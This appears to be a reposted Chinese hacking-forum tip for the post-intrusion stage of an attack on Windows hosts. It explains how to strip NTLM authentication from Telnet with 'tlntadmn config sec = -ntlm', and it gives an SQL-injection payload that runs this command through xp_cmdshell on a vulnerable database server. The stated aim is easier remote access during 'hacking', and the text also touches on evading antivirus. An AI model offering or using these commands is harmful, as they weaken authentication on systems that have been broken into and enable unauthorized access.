文章作者:紫幻[EST顧問團成員]
資訊來源:邪惡八進制 中國
相信大家都對telnet比較熟悉吧。hacking的時候經常用到的系統自帶shell尤其是注射的時候,但是最讨厭的就是ntlm認證了,以前大家去掉ntlm的方法一般有2種。
1 上傳ntml.exe 這種方法有很多缺點,比如:對方有防毒軟體,很多網段屏蔽了TFTP.
2 直接寫入telnet的配置資訊到文本中然後在用shell執行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接運作指令:tlntadmn config sec = -ntlm
注射的話可以直接運作:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
運作以後就去掉了該死的ntlm認證:) 趕快去試試吧。
最後祝大家聖誕快樂!!!
本文轉自loveme2351CTO部落格,原文連結:http://blog.51cto.com/loveme23/8568 ,如需轉載請自行聯系原作者
![1、Linux 指令行使用技巧[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)